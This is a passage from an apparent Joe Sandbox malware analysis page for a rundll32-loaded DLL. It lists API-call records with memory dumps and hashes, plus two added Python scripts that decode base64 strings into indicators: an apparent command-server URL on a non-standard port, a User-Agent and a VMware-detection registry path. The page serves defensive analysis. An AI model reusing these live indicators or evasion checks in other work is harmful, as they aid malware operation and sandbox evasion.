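The three function entries above each carry a base64-encoded string: the one referenced at 100085A3 (in the Sleep/wsprintf function), the one at 100061E2 (next to InternetOpenA), and R2V0Q3Vyc29yUG9z (in the CreateThread function). The report lists them as-is; what an analyst actually wants is the decoded values, because they are the sample's URL, its HTTP User-Agent and a Windows API name resolved at runtime. The script below is an added example written for this page, not Joe Sandbox output or code from the sample: it decodes the strings exactly as printed in the entries above (copied in as constructed input, keyed by the xref the report gives, or by the function's API ID where the report gives none), classifies each decoded value with simple heuristics that are this example's own assumptions (URL prefix, "Mozilla/" prefix, CamelCase API-style name), and, for a URL, splits out host, port and path and flags plain HTTP on a port outside a small whitelist, which is likewise an assumption chosen to match the report's "non-standard ports" signature. The decoded values follow from base64 alone; nothing here is looked up or guessed.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Base64 strings copied verbatim from the report's "Strings" entries above.
# Keys are the xref the report prints, or the function's API ID when the
# report gives no xref. This is constructed input for the example.
REPORT_STRINGS = {
    "100085A3": "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=",
    "100061E2": "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1",
    "CreateThread": "R2V0Q3Vyc29yUG9z",
}

# Ports on which plain HTTP is unremarkable; anything else on an http:// URL
# gets flagged. This whitelist is an assumption of the example, not a rule
# taken from the report.
STANDARD_HTTP_PORTS = {80, 8080, 8000, 8888}

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_b64_string(s):
    """Decode a candidate base64 string to printable ASCII, or return None."""
    if len(s) % 4 or not B64_RE.match(s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Reject blobs that decode to control bytes: those are data, not strings.
    if not text.isprintable():
        return None
    return text


def classify(text):
    """Tag a decoded string by its likely role (heuristics are assumptions)."""
    if re.match(r"^https?://", text):
        return "url"
    if text.startswith("Mozilla/"):
        return "user-agent"
    if re.fullmatch(r"[A-Z][A-Za-z0-9]+[AW]?", text):
        return "api-name"
    return "other"


def url_indicators(url):
    """Split an http(s) URL into host/port/path and flag a non-standard port."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return {
        "host": parts.hostname,
        "port": port,
        "path": parts.path,
        "nonstandard_port": parts.scheme == "http"
        and port not in STANDARD_HTTP_PORTS,
    }


def extract_iocs(strings):
    """Decode every base64 string in the mapping and collect the findings."""
    findings = []
    for xref, encoded in strings.items():
        decoded = decode_b64_string(encoded)
        if decoded is None:
            continue
        finding = {"xref": xref, "decoded": decoded, "kind": classify(decoded)}
        if finding["kind"] == "url":
            finding.update(url_indicators(decoded))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in extract_iocs(REPORT_STRINGS):
        print(finding)
```

Run stand-alone it prints one finding per string. The URL result is the one to act on: its host and port go straight into network blocking and hunting, and the `nonstandard_port` flag is what ties the string back to the report's "Uses known network protocols on non-standard ports" signature. The User-Agent is old enough (Firefox 3.6 on Windows NT 6.1, zh-CN locale) that it is a usable proxy-log indicator on its own, and the decoded API name explains why the report could not show a static import for it: it is resolved by name at runtime from a base64 constant.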
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep
• String ID: C:\Program Files
• API String ID: 3472027048-1387799010
• Opcode ID: 2291930864ef3eff619ea6b28b2f57ae492b4b10baed7b5fa4176fcec38f0e0e
• Instruction ID: 299bb4f2f6da416194b6909443d794439fa835322e1b0a08914665dd4d695e90
• Opcode Fuzzy Hash: 2291930864ef3eff619ea6b28b2f57ae492b4b10baed7b5fa4176fcec38f0e0e
• Instruction Fuzzy Hash: FCF04C769056A6A9F602DBA40CC15CF7769FF026A4B610022F940BF146D7F59A4243E1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: 80b38412ebeb4392f369f9e5b48e7952e28bd5fe5a6ec20ba06ae18a1de95141
                                                                                                                                                                          • Instruction ID: bdb3dc2fd668fa793b300cdb31c8481bf694da493985f631d8d3068bb7669da4
                                                                                                                                                                          • Opcode Fuzzy Hash: 80b38412ebeb4392f369f9e5b48e7952e28bd5fe5a6ec20ba06ae18a1de95141
                                                                                                                                                                          • Instruction Fuzzy Hash: ABF06D7A00C345EEC212EF60804108DBBE3EFC4311F124D1CB4842F312C775B9559B92
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: 3313878219ba196864bb5070412ff370055176ec33e6ab7f3a10a2e0d360e463
                                                                                                                                                                          • Instruction ID: 1cd95c2412de7701bec3f23c5cc0e67d7971dbdd805010661a28f4a1fc844042
                                                                                                                                                                          • Opcode Fuzzy Hash: 3313878219ba196864bb5070412ff370055176ec33e6ab7f3a10a2e0d360e463
                                                                                                                                                                          • Instruction Fuzzy Hash: 87F03A7A40C715EEC302EFA1918109EBBE3EFC8742F228C5DB4842B311C775B995AB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D83,?,10006D83,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                          • Opcode ID: 4468d0dea670f9f99cf7b1750d46a62ef963be4bfffbb1809d42d87fb691d60c
                                                                                                                                                                          • Instruction ID: c6ba46e0708592c8b7cfd3349602d25f74c43e1f0397a81e521459d35c3fc00e
                                                                                                                                                                          • Opcode Fuzzy Hash: 4468d0dea670f9f99cf7b1750d46a62ef963be4bfffbb1809d42d87fb691d60c
                                                                                                                                                                          • Instruction Fuzzy Hash: B2D09B3200014EBBCF025F81DD058DA3F6AFB0C2A9B068254FA1825430C776D9B1AB91
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: ad12984256e560304a239f9478dfc727c0219507a1d132967d44bc02133bf382
                                                                                                                                                                          • Instruction ID: 4dea5d81ded3fe389b5bfba3f71a04f2e4ed074394676f8df1518e5c184aca23
                                                                                                                                                                          • Opcode Fuzzy Hash: ad12984256e560304a239f9478dfc727c0219507a1d132967d44bc02133bf382
                                                                                                                                                                          • Instruction Fuzzy Hash: 68D0127C80C766EDC312FFB1408205D7AA1DE44742F064D6DB4802E302CA74FA455B93
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InternetOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2038078732-0
                                                                                                                                                                          • Opcode ID: 5ada80b7e0307531ecad8728767aece14519078488250715ec51feb695703235
                                                                                                                                                                          • Instruction ID: 9d53eed81376549a634a4aefa5c6fcceb58af181e7056f747c2cc6b1af68d793
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ada80b7e0307531ecad8728767aece14519078488250715ec51feb695703235
                                                                                                                                                                          • Instruction Fuzzy Hash: FDC0013200020EFBCF025FC1EC058DA7F2AFB082A0B008010FA1806031C733D971AB95
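The API reference lines in these function records (RegCreateKeyExA and InternetOpenA above, RegOpenKeyExA in the next record) pack the call site, the raw stack arguments and, occasionally, an encoded string into a single line. The Python below is an added example by the editor, not part of the Joe Sandbox report or its tooling. It splits such a line into function, module, arguments and reference address, decodes any argument that is valid base64 text (the RegOpenKeyExA line carries one), and names the 32-bit values that match documented registry constants from the Windows SDK headers. The sample lines are copied from this report; the image-pointer range is an assumption based on the 10000000 offset the records show.

```python
"""Parse Joe Sandbox "APIs" reference lines such as

  RegOpenKeyExA.KERNEL32(000000FF,?,...,QXBw...,?,10023F6B,10038DE4), ref: 100040CC

Added example, not Joe Sandbox code.
"""
import base64
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Documented Win32 values (winreg.h / winnt.h). Joe Sandbox prints every
# stack slot as 8 hex digits, so a match only says "this slot holds that
# value", not which parameter it is.
REG_CONSTANTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x000F003F: "KEY_ALL_ACCESS",
}

# Assumption: the module is loaded at 10000000 (per "Offset: 10000000" in
# the records); anything in this window is treated as a pointer into it.
IMAGE_BASE = 0x10000000
IMAGE_LIMIT = 0x10100000

# Sample lines copied from the report records on this page.
SAMPLE_LINES = {
    "RegCreateKeyExA": "RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,"
        "00000000,80000001,10006D83,?,10006D83,80000001,00000000,00000000,REG_SZ,"
        "00000000), ref: 1000408A",
    "InternetOpenA": "InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A),"
        " ref: 10003F1C",
    "RegOpenKeyExA": "RegOpenKeyExA.KERNEL32(000000FF,?,?,00000000,?,?,100044B6,80000000,"
        "00000000,00000000,000F003F,100152B0,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,"
        "?,10023F6B,10038DE4), ref: 100040CC",
}


@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int                                   # call-site address from "ref:"
    decoded: dict = field(default_factory=dict)    # arg index -> base64-decoded text
    constants: dict = field(default_factory=dict)  # arg index -> constant name
    image_ptrs: list = field(default_factory=list) # arg indexes inside the image window


def try_b64(text):
    """Return the decoded printable ASCII string if text is valid base64, else None."""
    if len(text) < 8 or len(text) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", text):
        return None
    try:
        raw = base64.b64decode(text, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return raw if raw.isprintable() else None


def parse_api_line(line):
    """Split one API reference line and annotate its arguments."""
    m = API_LINE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not an API reference line: {line!r}")
    args = [a.strip() for a in m.group("args").split(",")]
    call = ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16))
    for i, a in enumerate(args):
        if re.fullmatch(r"[0-9A-Fa-f]{8}", a):      # 32-bit immediate, not a string
            value = int(a, 16)
            if value in REG_CONSTANTS:
                call.constants[i] = REG_CONSTANTS[value]
            elif IMAGE_BASE <= value < IMAGE_LIMIT:
                call.image_ptrs.append(i)
            continue
        plain = try_b64(a)                          # "?" and REG_SZ fall through here
        if plain is not None:
            call.decoded[i] = plain
    return call


def summarize(call):
    """One-line human summary used when running the block directly."""
    parts = [f"{call.func} ({call.module}) at {call.ref:08X}"]
    parts += [f"arg{i}={name}" for i, name in sorted(call.constants.items())]
    parts += [f"arg{i}=b64:{text!r}" for i, text in sorted(call.decoded.items())]
    return "; ".join(parts)


if __name__ == "__main__":
    for line in SAMPLE_LINES.values():
        print(summarize(parse_api_line(line)))
```

The base64 argument in the RegOpenKeyExA record decodes to the path `Applications\\VMwareHostOpen.exe`, which is consistent with the anti-VM checks flagged elsewhere in this report; the decoder only accepts printable ASCII so that 8-digit hex immediates and pointer values are never misread as text.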
APIs
• RegOpenKeyExA.KERNEL32(000000FF,?,?,00000000,?,?,100044B6,80000000,00000000,00000000,000F003F,100152B0,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,?,10023F6B,10038DE4), ref: 100040CC
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 004c0763fc38ed271ff131682deff9bc923b77ca4c8158dd99e58b07c25c9ea7
• Instruction ID: 77985ed2f1b0b55fab5b796168f91cb690cc609832010200395dc5096bea9058
• Opcode Fuzzy Hash: 004c0763fc38ed271ff131682deff9bc923b77ca4c8158dd99e58b07c25c9ea7
• Instruction Fuzzy Hash: 03C0013200020EFBCF025F81EC058DA3F6AFB082A1B008010FA1805030C773D9B1AB91
APIs
• CreateMutexA.KERNEL32(?,?,?,10006AC6,00000000,00000000,0x5d65r455f,?,00000202,?), ref: 10003EDA
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: 3ad23f1a89e44850972ba528bcc2489416e04d2579e5b050aa8df1dc9d665d66
• Instruction ID: 3c48f8fa6a8358b664fd3951d3b8fac3706ee28bfef3f7cf4a1830814139b7d7
• Opcode Fuzzy Hash: 3ad23f1a89e44850972ba528bcc2489416e04d2579e5b050aa8df1dc9d665d66
• Instruction Fuzzy Hash: 07B00235408211BFDF025B50DD5480ABFA2BB88325F14C958F1A941031C7328424EF42
APIs
• GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: NamePathShort
• String ID:
• API String ID: 1295925010-0
• Opcode ID: 2d4668a70104dc81522273e86be88e5be1766fadaf37d1f10af6586c2f1dcbe7
• Instruction ID: 67191f8e8a6808ebc338456d7226a707f4b3656e6c1bcc3e14e030810b1eb0a7
• Opcode Fuzzy Hash: 2d4668a70104dc81522273e86be88e5be1766fadaf37d1f10af6586c2f1dcbe7
• Instruction Fuzzy Hash: 03B0097A50A210BFDF025B91DE4880ABBA2BB88321F10C958F2A940131C7328520EB02
APIs
• Process32First.KERNEL32(00000000,00000000), ref: 1000410C
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: FirstProcess32
